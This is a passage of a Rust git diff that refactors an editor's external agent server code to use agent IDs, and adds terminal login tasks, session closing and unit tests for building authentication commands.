a/crates/agent_servers/src/acp.rs b/crates/agent_servers/src/acp.rs index ceceb5b8ae02a0674b27e0fa18244a94f2b409de..f7b6a59a63b02028a8b30c905c92b82805a52b33 100644 --- a/crates/agent_servers/src/acp.rs +++ b/crates/agent_servers/src/acp.rs @@ -7,20 +7,22 @@ use action_log::ActionLog; use agent_client_protocol::{self as acp, Agent as _, ErrorCode}; use anyhow::anyhow; use collections::HashMap; +use feature_flags::{AcpBetaFeatureFlag, FeatureFlagAppExt as _}; use futures::AsyncBufReadExt as _; use futures::io::BufReader; -use project::Project; -use project::agent_server_store::{AgentServerCommand, GEMINI_NAME}; +use project::agent_server_store::AgentServerCommand; +use project::{AgentId, Project}; use serde::Deserialize; use settings::Settings as _; -use task::ShellBuilder; +use task::{ShellBuilder, SpawnInTerminal}; use util::ResultExt as _; +use util::path_list::PathList; use util::process::Child; use std::path::PathBuf; use std::process::Stdio; +use std::rc::Rc; use std::{any::Any, cell::RefCell}; -use std::{path::Path, rc::Rc}; use thiserror::Error; use anyhow::{Context as _, Result}; @@ -30,17 +32,21 @@ use acp_thread::{AcpThread, AuthRequired, LoadError, TerminalProviderEvent}; use terminal::TerminalBuilder; use terminal::terminal_settings::{AlternateScroll, CursorShape, TerminalSettings}; +use crate::GEMINI_ID; + +pub const GEMINI_TERMINAL_AUTH_METHOD_ID: &str = "spawn-gemini-cli"; + #[derive(Debug, Error)] #[error("Unsupported version")] pub struct UnsupportedVersion; pub struct AcpConnection { - server_name: SharedString, - display_name: SharedString, + id: AgentId, telemetry_id: SharedString, connection: Rc, sessions: Rc>>, auth_methods: Vec, + command: AgentServerCommand, agent_capabilities: acp::AgentCapabilities, default_mode: Option, default_model: Option, @@ -124,13 +130,14 @@ impl AgentSessionList for AcpSessionList { .into_iter() .map(|s| AgentSessionInfo { session_id: s.session_id, - cwd: Some(s.cwd), + work_dirs: Some(PathList::new(&[s.cwd])), title: s.title.map(Into::into), updated_at: s.updated_at.and_then(|date_str| { chrono::DateTime::parse_from_rfc3339(&date_str) .ok() .map(|dt| dt.with_timezone(&chrono::Utc)) }), + created_at: None, meta: s.meta, }) .collect(), @@ -157,8 +164,8 @@ impl AgentSessionList for AcpSessionList { } pub async fn connect( - server_name: SharedString, - display_name: SharedString, + agent_id: AgentId, + project: Entity, command: AgentServerCommand, default_mode: Option, default_model: Option, @@ -166,8 +173,8 @@ pub async fn connect( cx: &mut AsyncApp, ) -> Result> { let conn = AcpConnection::stdio( - server_name, - display_name, + agent_id, + project, command.clone(), default_mode, default_model, @@ -182,8 +189,8 @@ const MINIMUM_SUPPORTED_VERSION: acp::ProtocolVersion = acp::ProtocolVersion::V1 impl AcpConnection { pub async fn stdio( - server_name: SharedString, - display_name: SharedString, + agent_id: AgentId, + project: Entity, command: AgentServerCommand, default_mode: Option, default_model: Option, @@ -195,6 +202,15 @@ impl AcpConnection { let mut child = builder.build_std_command(Some(command.path.display().to_string()), &command.args); child.envs(command.env.iter().flatten()); + if let Some(cwd) = project.update(cx, |project, cx| { + project + .default_path_list(cx) + .ordered_paths() + .next() + .cloned() + }) { + child.current_dir(cwd); + } let mut child = Child::spawn(child, Stdio::piped(), Stdio::piped(), Stdio::piped())?; let stdout = child.stdout.take().context("Failed to take stdout")?; @@ -269,7 +285,7 @@ impl AcpConnection { cx.update(|cx| { AcpConnectionRegistry::default_global(cx).update(cx, |registry, cx| { - registry.set_active_connection(server_name.clone(), &connection, cx) + registry.set_active_connection(agent_id.clone(), &connection, cx) }); }); @@ -278,10 +294,11 @@ impl AcpConnection { acp::InitializeRequest::new(acp::ProtocolVersion::V1) .client_capabilities( acp::ClientCapabilities::new() - .fs(acp::FileSystemCapability::new() + .fs(acp::FileSystemCapabilities::new() .read_text_file(true) .write_text_file(true)) .terminal(true) + .auth(acp::AuthCapabilities::new().terminal(true)) // Experimental: Allow for rendering terminal output from the agents .meta(acp::Meta::from_iter([ ("terminal_output".into(), true.into()), @@ -304,7 +321,7 @@ impl AcpConnection { // Use the one the agent provides if we have one .map(|info| info.name.into()) // Otherwise, just use the name - .unwrap_or_else(|| server_name.clone()); + .unwrap_or_else(|| agent_id.0.to_string().into()); let session_list = if response .agent_capabilities @@ -320,9 +337,9 @@ impl AcpConnection { }; // TODO: Remove this override once Google team releases their official auth methods - let auth_methods = if server_name == GEMINI_NAME { + let auth_methods = if agent_id.0.as_ref() == GEMINI_ID { let mut args = command.args.clone(); - args.retain(|a| a != "--experimental-acp"); + args.retain(|a| a != "--experimental-acp" && a != "--acp"); let value = serde_json::json!({ "label": "gemini /auth", "command": command.path.to_string_lossy().into_owned(), @@ -330,19 +347,19 @@ impl AcpConnection { "env": command.env.clone().unwrap_or_default(), }); let meta = acp::Meta::from_iter([("terminal-auth".to_string(), value)]); - vec![ - acp::AuthMethod::new("spawn-gemini-cli", "Login") + vec![acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(GEMINI_TERMINAL_AUTH_METHOD_ID, "Login") .description("Login with your Google or Vertex AI account") .meta(meta), - ] + )] } else { response.auth_methods }; Ok(Self { + id: agent_id, auth_methods, + command, connection, - server_name, - display_name, telemetry_id, sessions, agent_capabilities: response.agent_capabilities, @@ -360,6 +377,102 @@ impl AcpConnection { pub fn prompt_capabilities(&self) -> &acp::PromptCapabilities { &self.agent_capabilities.prompt_capabilities } + + fn apply_default_config_options( + &self, + session_id: &acp::SessionId, + config_options: &Rc>>, + cx: &mut AsyncApp, + ) { + let id = self.id.clone(); + let defaults_to_apply: Vec<_> = { + let config_opts_ref = config_options.borrow(); + config_opts_ref + .iter() + .filter_map(|config_option| { + let default_value = self.default_config_options.get(&*config_option.id.0)?; + + let is_valid = match &config_option.kind { + acp::SessionConfigKind::Select(select) => match &select.options { + acp::SessionConfigSelectOptions::Ungrouped(options) => options + .iter() + .any(|opt| &*opt.value.0 == default_value.as_str()), + acp::SessionConfigSelectOptions::Grouped(groups) => { + groups.iter().any(|g| { + g.options + .iter() + .any(|opt| &*opt.value.0 == default_value.as_str()) + }) + } + _ => false, + }, + _ => false, + }; + + if is_valid { + let initial_value = match &config_option.kind { + acp::SessionConfigKind::Select(select) => { + Some(select.current_value.clone()) + } + _ => None, + }; + Some(( + config_option.id.clone(), + default_value.clone(), + initial_value, + )) + } else { + log::warn!( + "`{}` is not a valid value for config option `{}` in {}", + default_value, + config_option.id.0, + id + ); + None + } + }) + .collect() + }; + + for (config_id, default_value, initial_value) in defaults_to_apply { + cx.spawn({ + let default_value_id = acp::SessionConfigValueId::new(default_value.clone()); + let session_id = session_id.clone(); + let config_id_clone = config_id.clone(); + let config_opts = config_options.clone(); + let conn = self.connection.clone(); + async move |_| { + let result = conn + .set_session_config_option(acp::SetSessionConfigOptionRequest::new( + session_id, + config_id_clone.clone(), + default_value_id, + )) + .await + .log_err(); + + if result.is_none() { + if let Some(initial) = initial_value { + let mut opts = config_opts.borrow_mut(); + if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) { + if let acp::SessionConfigKind::Select(select) = &mut opt.kind { + select.current_value = initial; + } + } + } + } + } + }) + .detach(); + + let mut opts = config_options.borrow_mut(); + if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) { + if let acp::SessionConfigKind::Select(select) = &mut opt.kind { + select.current_value = acp::SessionConfigValueId::new(default_value); + } + } + } + } } impl Drop for AcpConnection { @@ -368,7 +481,69 @@ impl Drop for AcpConnection { } } +fn terminal_auth_task_id(agent_id: &AgentId, method_id: &acp::AuthMethodId) -> String { + format!("external-agent-{}-{}-login", agent_id.0, method_id.0) +} + +fn terminal_auth_task( + command: &AgentServerCommand, + agent_id: &AgentId, + method: &acp::AuthMethodTerminal, +) -> SpawnInTerminal { + let mut args = command.args.clone(); + args.extend(method.args.clone()); + + let mut env = command.env.clone().unwrap_or_default(); + env.extend(method.env.clone()); + + acp_thread::build_terminal_auth_task( + terminal_auth_task_id(agent_id, &method.id), + method.name.clone(), + command.path.to_string_lossy().into_owned(), + args, + env, + ) +} + +/// Used to support the _meta method prior to stabilization +fn meta_terminal_auth_task( + agent_id: &AgentId, + method_id: &acp::AuthMethodId, + method: &acp::AuthMethod, +) -> Option { + #[derive(Deserialize)] + struct MetaTerminalAuth { + label: String, + command: String, + #[serde(default)] + args: Vec, + #[serde(default)] + env: HashMap, + } + + let meta = match method { + acp::AuthMethod::EnvVar(env_var) => env_var.meta.as_ref(), + acp::AuthMethod::Terminal(terminal) => terminal.meta.as_ref(), + acp::AuthMethod::Agent(agent) => agent.meta.as_ref(), + _ => None, + }?; + let terminal_auth = + serde_json::from_value::(meta.get("terminal-auth")?.clone()).ok()?; + + Some(acp_thread::build_terminal_auth_task( + terminal_auth_task_id(agent_id, method_id), + terminal_auth.label.clone(), + terminal_auth.command, + terminal_auth.args, + terminal_auth.env, + )) +} + impl AgentConnection for AcpConnection { + fn agent_id(&self) -> AgentId { + self.id.clone() + } + fn telemetry_id(&self) -> SharedString { self.telemetry_id.clone() } @@ -376,11 +551,14 @@ impl AgentConnection for AcpConnection { fn new_session( self: Rc, project: Entity, - cwd: &Path, + work_dirs: PathList, cx: &mut App, ) -> Task>> { - let name = self.server_name.clone(); - let cwd = cwd.to_path_buf(); + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; + let name = self.id.0.clone(); let mcp_servers = mcp_servers_for_project(&project, cx); cx.spawn(async move |cx| { @@ -470,97 +648,15 @@ impl AgentConnection for AcpConnection { } if let Some(config_opts) = config_options.as_ref() { - let defaults_to_apply: Vec<_> = { - let config_opts_ref = config_opts.borrow(); - config_opts_ref - .iter() - .filter_map(|config_option| { - let default_value = self.default_config_options.get(&*config_option.id.0)?; - - let is_valid = match &config_option.kind { - acp::SessionConfigKind::Select(select) => match &select.options { - acp::SessionConfigSelectOptions::Ungrouped(options) => { - options.iter().any(|opt| &*opt.value.0 == default_value.as_str()) - } - acp::SessionConfigSelectOptions::Grouped(groups) => groups - .iter() - .any(|g| g.options.iter().any(|opt| &*opt.value.0 == default_value.as_str())), - _ => false, - }, - _ => false, - }; - - if is_valid { - let initial_value = match &config_option.kind { - acp::SessionConfigKind::Select(select) => { - Some(select.current_value.clone()) - } - _ => None, - }; - Some((config_option.id.clone(), default_value.clone(), initial_value)) - } else { - log::warn!( - "`{}` is not a valid value for config option `{}` in {}", - default_value, - config_option.id.0, - name - ); - None - } - }) - .collect() - }; - - for (config_id, default_value, initial_value) in defaults_to_apply { - cx.spawn({ - let default_value_id = acp::SessionConfigValueId::new(default_value.clone()); - let session_id = response.session_id.clone(); - let config_id_clone = config_id.clone(); - let config_opts = config_opts.clone(); - let conn = self.connection.clone(); - async move |_| { - let result = conn - .set_session_config_option( - acp::SetSessionConfigOptionRequest::new( - session_id, - config_id_clone.clone(), - default_value_id, - ), - ) - .await - .log_err(); - - if result.is_none() { - if let Some(initial) = initial_value { - let mut opts = config_opts.borrow_mut(); - if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id_clone) { - if let acp::SessionConfigKind::Select(select) = - &mut opt.kind - { - select.current_value = initial; - } - } - } - } - } - }) - .detach(); - - let mut opts = config_opts.borrow_mut(); - if let Some(opt) = opts.iter_mut().find(|o| o.id == config_id) { - if let acp::SessionConfigKind::Select(select) = &mut opt.kind { - select.current_value = acp::SessionConfigValueId::new(default_value); - } - } - } + self.apply_default_config_options(&response.session_id, config_opts, cx); } let action_log = cx.new(|_| ActionLog::new(project.clone())); let thread: Entity = cx.new(|cx| { AcpThread::new( None, - self.display_name.clone(), - Some(cwd), + None, + Some(work_dirs), self.clone(), project, action_log, @@ -601,7 +697,7 @@ impl AgentConnection for AcpConnection { self: Rc, session_id: acp::SessionId, project: Entity, - cwd: &Path, + work_dirs: PathList, title: Option, cx: &mut App, ) -> Task>> { @@ -610,16 +706,18 @@ impl AgentConnection for AcpConnection { "Loading sessions is not supported by this agent.".into() )))); } + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; - let cwd = cwd.to_path_buf(); let mcp_servers = mcp_servers_for_project(&project, cx); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let title = title.unwrap_or_else(|| self.display_name.clone()); let thread: Entity = cx.new(|cx| { AcpThread::new( None, title, - Some(cwd.clone()), + Some(work_dirs.clone()), self.clone(), project, action_log, @@ -640,7 +738,7 @@ impl AgentConnection for AcpConnection { }, ); - cx.spawn(async move |_| { + cx.spawn(async move |cx| { let response = match self .connection .load_session( @@ -657,6 +755,11 @@ impl AgentConnection for AcpConnection { let (modes, models, config_options) = config_state(response.modes, response.models, response.config_options); + + if let Some(config_opts) = config_options.as_ref() { + self.apply_default_config_options(&session_id, config_opts, cx); + } + if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) { session.session_modes = modes; session.models = models; @@ -671,7 +774,7 @@ impl AgentConnection for AcpConnection { self: Rc, session_id: acp::SessionId, project: Entity, - cwd: &Path, + work_dirs: PathList, title: Option, cx: &mut App, ) -> Task>> { @@ -685,16 +788,18 @@ impl AgentConnection for AcpConnection { "Resuming sessions is not supported by this agent.".into() )))); } + // TODO: remove this once ACP supports multiple working directories + let Some(cwd) = work_dirs.ordered_paths().next().cloned() else { + return Task::ready(Err(anyhow!("Working directory cannot be empty"))); + }; - let cwd = cwd.to_path_buf(); let mcp_servers = mcp_servers_for_project(&project, cx); let action_log = cx.new(|_| ActionLog::new(project.clone())); - let title = title.unwrap_or_else(|| self.display_name.clone()); let thread: Entity = cx.new(|cx| { AcpThread::new( None, title, - Some(cwd.clone()), + Some(work_dirs), self.clone(), project, action_log, @@ -715,7 +820,7 @@ impl AgentConnection for AcpConnection { }, ); - cx.spawn(async move |_| { + cx.spawn(async move |cx| { let response = match self .connection .resume_session( @@ -733,6 +838,11 @@ impl AgentConnection for AcpConnection { let (modes, models, config_options) = config_state(response.modes, response.models, response.config_options); + + if let Some(config_opts) = config_options.as_ref() { + self.apply_default_config_options(&session_id, config_opts, cx); + } + if let Some(session) = self.sessions.borrow_mut().get_mut(&session_id) { session.session_modes = modes; session.models = models; @@ -743,10 +853,53 @@ impl AgentConnection for AcpConnection { }) } + fn supports_close_session(&self) -> bool { + self.agent_capabilities.session_capabilities.close.is_some() + } + + fn close_session( + self: Rc, + session_id: &acp::SessionId, + cx: &mut App, + ) -> Task> { + if !self.supports_close_session() { + return Task::ready(Err(anyhow!(LoadError::Other( + "Closing sessions is not supported by this agent.".into() + )))); + } + + let conn = self.connection.clone(); + let session_id = session_id.clone(); + cx.foreground_executor().spawn(async move { + conn.close_session(acp::CloseSessionRequest::new(session_id.clone())) + .await?; + self.sessions.borrow_mut().remove(&session_id); + Ok(()) + }) + } + fn auth_methods(&self) -> &[acp::AuthMethod] { &self.auth_methods } + fn terminal_auth_task( + &self, + method_id: &acp::AuthMethodId, + cx: &App, + ) -> Option { + let method = self + .auth_methods + .iter() + .find(|method| method.id() == method_id)?; + + match method { + acp::AuthMethod::Terminal(terminal) if cx.has_flag::() => { + Some(terminal_auth_task(&self.command, &self.id, terminal)) + } + _ => meta_terminal_auth_task(&self.id, method_id, method), + } + } + fn authenticate(&self, method_id: acp::AuthMethodId, cx: &mut App) -> Task> { let conn = self.connection.clone(); cx.foreground_executor().spawn(async move { @@ -913,6 +1066,149 @@ fn map_acp_error(err: acp::Error) -> anyhow::Error { } } +#[cfg(test)] +mod tests { + use super::*; + + #[test] + fn terminal_auth_task_reuses_command_and_merges_args_and_env() { + let command = AgentServerCommand { + path: "/path/to/agent".into(), + args: vec!["--acp".into(), "--verbose".into()], + env: Some(HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("SHARED".into(), "base".into()), + ])), + }; + let method = acp::AuthMethodTerminal::new("login", "Login") + .args(vec!["/auth".into()]) + .env(std::collections::HashMap::from_iter([ + ("EXTRA".into(), "2".into()), + ("SHARED".into(), "override".into()), + ])); + + let terminal_auth_task = terminal_auth_task(&command, &AgentId::new("test-agent"), &method); + + assert_eq!( + terminal_auth_task.command.as_deref(), + Some("/path/to/agent") + ); + assert_eq!(terminal_auth_task.args, vec!["--acp", "--verbose", "/auth"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("SHARED".into(), "override".into()), + ("EXTRA".into(), "2".into()), + ]) + ); + assert_eq!(terminal_auth_task.label, "Login"); + assert_eq!(terminal_auth_task.command_label, "Login"); + } + + #[test] + fn legacy_terminal_auth_task_parses_meta_and_retries_session() { + let method_id = acp::AuthMethodId::new("legacy-login"); + let method = acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + "command": "legacy-agent", + "args": ["auth", "--interactive"], + "env": { + "AUTH_MODE": "interactive", + }, + }), + )])), + ); + + let terminal_auth_task = + meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method) + .expect("expected legacy terminal auth task"); + + assert_eq!( + terminal_auth_task.id.0, + "external-agent-test-agent-legacy-login-login" + ); + assert_eq!(terminal_auth_task.command.as_deref(), Some("legacy-agent")); + assert_eq!(terminal_auth_task.args, vec!["auth", "--interactive"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([("AUTH_MODE".into(), "interactive".into())]) + ); + assert_eq!(terminal_auth_task.label, "legacy /auth"); + } + + #[test] + fn legacy_terminal_auth_task_returns_none_for_invalid_meta() { + let method_id = acp::AuthMethodId::new("legacy-login"); + let method = acp::AuthMethod::Agent( + acp::AuthMethodAgent::new(method_id.clone(), "Login").meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + }), + )])), + ); + + assert!( + meta_terminal_auth_task(&AgentId::new("test-agent"), &method_id, &method).is_none() + ); + } + + #[test] + fn first_class_terminal_auth_takes_precedence_over_legacy_meta() { + let method_id = acp::AuthMethodId::new("login"); + let method = acp::AuthMethod::Terminal( + acp::AuthMethodTerminal::new(method_id, "Login") + .args(vec!["/auth".into()]) + .env(std::collections::HashMap::from_iter([( + "AUTH_MODE".into(), + "first-class".into(), + )])) + .meta(acp::Meta::from_iter([( + "terminal-auth".to_string(), + serde_json::json!({ + "label": "legacy /auth", + "command": "legacy-agent", + "args": ["legacy-auth"], + "env": { + "AUTH_MODE": "legacy", + }, + }), + )])), + ); + + let command = AgentServerCommand { + path: "/path/to/agent".into(), + args: vec!["--acp".into()], + env: Some(HashMap::from_iter([("BASE".into(), "1".into())])), + }; + + let terminal_auth_task = match &method { + acp::AuthMethod::Terminal(terminal) => { + terminal_auth_task(&command, &AgentId::new("test-agent"), terminal) + } + _ => unreachable!(), + }; + + assert_eq!( + terminal_auth_task.command.as_deref(), + Some("/path/to/agent") + ); + assert_eq!(terminal_auth_task.args, vec!["--acp", "/auth"]); + assert_eq!( + terminal_auth_task.env, + HashMap::from_iter([ + ("BASE".into(), "1".into()), + ("AUTH_MODE".into(), "first-class".into()), + ]) + ); + assert_eq!(terminal_auth_task.label, "Login"); + } +} + fn mcp_servers_for_project(project: &Entity, cx: &App) -> Vec { let context_server_store = project.read(cx).context_server_store().read(cx); let is_local = project.read(cx).is_local(); @@ -1167,7 +1463,7 @@ impl acp::Client for ClientDelegate { let outcome = task.await; - Ok(acp::RequestPermissionResponse::new(outcome)) + Ok(acp::RequestPermissionResponse::new(outcome.into())) } async fn write_text_file( @@ -1372,10 +1668,10 @@ impl acp::Client for ClientDelegate { Ok(acp::CreateTerminalResponse::new(terminal_id)) } - async fn kill_terminal_command( + async fn kill_terminal( &self, - args: acp::KillTerminalCommandRequest, - ) -> Result { + args: acp::KillTerminalRequest, + ) -> Result { self.session_thread(&args.session_id)? .update(&mut self.cx.clone(), |thread, cx| { thread.kill_terminal(args.terminal_id, cx) diff --git a/crates/agent_servers/src/agent_servers.rs b/crates/agent_servers/src/agent_servers.rs index a07226ca25095fdb7037114d32d5033364a4999f..2016e5aaaa27b62c956c5eee49c989172980de49 100644 --- a/crates/agent_servers/src/agent_servers.rs +++ b/crates/agent_servers/src/agent_servers.rs @@ -9,50 +9,40 @@ use collections::{HashMap, HashSet}; pub use custom::*; use fs::Fs; use http_client::read_no_proxy_from_env; -use project::agent_server_store::AgentServerStore; +use project::{AgentId, Project, agent_server_store::AgentServerStore}; use acp_thread::AgentConnection; use anyhow::Result; -use gpui::{App, AppContext, Entity, SharedString, Task}; -use project::Project; +use gpui::{App, AppContext, Entity, Task}; use settings::SettingsStore; use std::{any::Any, rc::Rc, sync::Arc}; -pub use acp::AcpConnection; +pub use acp::{AcpConnection, GEMINI_TERMINAL_AUTH_METHOD_ID}; pub struct AgentServerDelegate { store: Entity, - project: Entity, - status_tx: Option>, new_version_available: Option>>, } impl AgentServerDelegate { pub fn new( store: Entity, - project: Entity, - status_tx: Option>, new_version_tx: Option>>, ) -> Self { Self { store, - project, - status_tx, new_version_available: new_version_tx, } } - - pub fn project(&self) -> &Entity { - &self.project - } } pub trait AgentServer: Send { fn logo(&self) -> ui::IconName; - fn name(&self) -> SharedString; + fn agent_id(&self) -> AgentId; fn connect( &self, delegate: AgentServerDelegate, + project: Entity, cx: &mut App, ) -> Task>>; diff --git a/crates/agent_servers/src/custom.rs b/crates/agent_servers/src/custom.rs index 0a1830717217872868e66a8222902c49eeaabf9c..0dcd2240d6ecf6dc052cdd55953cff8ec1442eae 100644 --- a/crates/agent_servers/src/custom.rs +++ b/crates/agent_servers/src/custom.rs @@ -5,29 +5,34 @@ use anyhow::{Context as _, Result}; use collections::HashSet; use credentials_provider::CredentialsProvider; use fs::Fs; -use gpui::{App, AppContext as _, SharedString, Task}; +use gpui::{App, AppContext as _, Entity, Task}; use language_model::{ApiKey, EnvVar}; -use project::agent_server_store::{ - AllAgentServersSettings, CLAUDE_AGENT_NAME, CODEX_NAME, ExternalAgentServerName, GEMINI_NAME, +use project::{ + Project, + agent_server_store::{AgentId, AllAgentServersSettings}, }; use settings::{SettingsStore, update_settings_file}; use std::{rc::Rc, sync::Arc}; use ui::IconName; +pub const GEMINI_ID: &str = "gemini"; +pub const CLAUDE_AGENT_ID: &str = "claude-acp"; +pub const CODEX_ID: &str = "codex-acp"; + /// A generic agent server implementation for custom user-defined agents pub struct CustomAgentServer { - name: SharedString, + agent_id: AgentId, } impl CustomAgentServer { - pub fn new(name: SharedString) -> Self { - Self { name } + pub fn new(agent_id: AgentId) -> Self { + Self { agent_id } } } impl AgentServer for CustomAgentServer { - fn name(&self) -> SharedString { - self.name.clone() + fn agent_id(&self) -> AgentId { + self.agent_id.clone() } fn logo(&self) -> IconName { @@ -38,7 +43,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().0.as_ref()) .cloned() }); @@ -55,7 +60,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().0.as_ref()) .cloned() }); @@ -80,7 +85,7 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &App, ) { - let name = self.name(); + let agent_id = self.agent_id(); let config_id = config_id.to_string(); let value_id = value_id.to_string(); @@ -88,8 +93,8 @@ impl AgentServer for CustomAgentServer { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { @@ -124,13 +129,13 @@ impl AgentServer for CustomAgentServer { } fn set_default_mode(&self, mode_id: Option, fs: Arc, cx: &mut App) { - let name = self.name(); + let agent_id = self.agent_id(); update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { default_mode, .. } @@ -146,7 +151,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -156,13 +161,13 @@ impl AgentServer for CustomAgentServer { } fn set_default_model(&self, model_id: Option, fs: Arc, cx: &mut App) { - let name = self.name(); + let agent_id = self.agent_id(); update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { default_model, .. } @@ -178,7 +183,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -200,13 +205,13 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &App, ) { - let name = self.name(); + let agent_id = self.agent_id(); update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); let favorite_models = match settings { settings::CustomAgentServerSettings::Custom { @@ -235,7 +240,7 @@ impl AgentServer for CustomAgentServer { let settings = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .cloned() }); @@ -251,15 +256,15 @@ impl AgentServer for CustomAgentServer { fs: Arc, cx: &mut App, ) { - let name = self.name(); + let agent_id = self.agent_id(); let config_id = config_id.to_string(); let value_id = value_id.map(|s| s.to_string()); update_settings_file(fs, cx, move |settings, cx| { let settings = settings .agent_servers .get_or_insert_default() - .entry(name.to_string()) - .or_insert_with(|| default_settings_for_agent(&name, cx)); + .entry(agent_id.0.to_string()) + .or_insert_with(|| default_settings_for_agent(agent_id, cx)); match settings { settings::CustomAgentServerSettings::Custom { @@ -287,21 +292,17 @@ impl AgentServer for CustomAgentServer { fn connect( &self, delegate: AgentServerDelegate, + project: Entity, cx: &mut App, ) -> Task>> { - let name = self.name(); - let display_name = delegate - .store - .read(cx) - .agent_display_name(&ExternalAgentServerName(name.clone())) - .unwrap_or_else(|| name.clone()); + let agent_id = self.agent_id(); let default_mode = self.default_mode(cx); let default_model = self.default_model(cx); - let is_registry_agent = is_registry_agent(&name, cx); + let is_registry_agent = is_registry_agent(agent_id.clone(), cx); let default_config_options = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(self.name().as_ref()) + .get(self.agent_id().as_ref()) .map(|s| match s { project::agent_server_store::CustomAgentServerSettings::Custom { default_config_options, @@ -330,11 +331,11 @@ impl AgentServer for CustomAgentServer { extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned()); } if is_registry_agent { - match name.as_ref() { - CLAUDE_AGENT_NAME => { + match agent_id.as_ref() { + CLAUDE_AGENT_ID => { extra_env.insert("ANTHROPIC_API_KEY".into(), "".into()); } - CODEX_NAME => { + CODEX_ID => { if let Ok(api_key) = std::env::var("CODEX_API_KEY") { extra_env.insert("CODEX_API_KEY".into(), api_key); } @@ -342,7 +343,7 @@ impl AgentServer for CustomAgentServer { extra_env.insert("OPEN_AI_API_KEY".into(), api_key); } } - GEMINI_NAME => { + GEMINI_ID => { extra_env.insert("SURFACE".to_owned(), "zed".to_owned()); } _ => {} @@ -350,29 +351,26 @@ impl AgentServer for CustomAgentServer { } let store = delegate.store.downgrade(); cx.spawn(async move |cx| { - if is_registry_agent && name.as_ref() == GEMINI_NAME { + if is_registry_agent && agent_id.as_ref() == GEMINI_ID { if let Some(api_key) = cx.update(api_key_for_gemini_cli).await.ok() { extra_env.insert("GEMINI_API_KEY".into(), api_key); } } let command = store .update(cx, |store, cx| { - let agent = store - .get_external_agent(&ExternalAgentServerName(name.clone())) - .with_context(|| { - format!("Custom agent server `{}` is not registered", name) - })?; + let agent = store.get_external_agent(&agent_id).with_context(|| { + format!("Custom agent server `{}` is not registered", agent_id) + })?; anyhow::Ok(agent.get_command( extra_env, - delegate.status_tx, delegate.new_version_available, &mut cx.to_async(), )) })?? .await?; let connection = crate::acp::connect( - name, - display_name, + agent_id, + project, command, default_mode, default_model, @@ -406,15 +404,15 @@ fn api_key_for_gemini_cli(cx: &mut App) -> Task> { }) } -fn is_registry_agent(name: &str, cx: &App) -> bool { - let is_previous_built_in = matches!(name, CLAUDE_AGENT_NAME | CODEX_NAME | GEMINI_NAME); +fn is_registry_agent(agent_id: impl Into, cx: &App) -> bool { + let agent_id = agent_id.into(); let is_in_registry = project::AgentRegistryStore::try_global(cx) - .map(|store| store.read(cx).agent(name).is_some()) + .map(|store| store.read(cx).agent(&agent_id).is_some()) .unwrap_or(false); let is_settings_registry = cx.read_global(|settings: &SettingsStore, _| { settings .get::(None) - .get(name) + .get(agent_id.as_ref()) .is_some_and(|s| { matches!( s, @@ -422,11 +420,14 @@ fn is_registry_agent(name: &str, cx: &App) -> bool { ) }) }); - is_previous_built_in || is_in_registry || is_settings_registry + is_in_registry || is_settings_registry } -fn default_settings_for_agent(name: &str, cx: &App) -> settings::CustomAgentServerSettings { - if is_registry_agent(name, cx) { +fn default_settings_for_agent( + agent_id: impl Into, + cx: &App, +) -> settings::CustomAgentServerSettings { + if is_registry_agent(agent_id, cx) { settings::CustomAgentServerSettings::Registry { default_model: None, 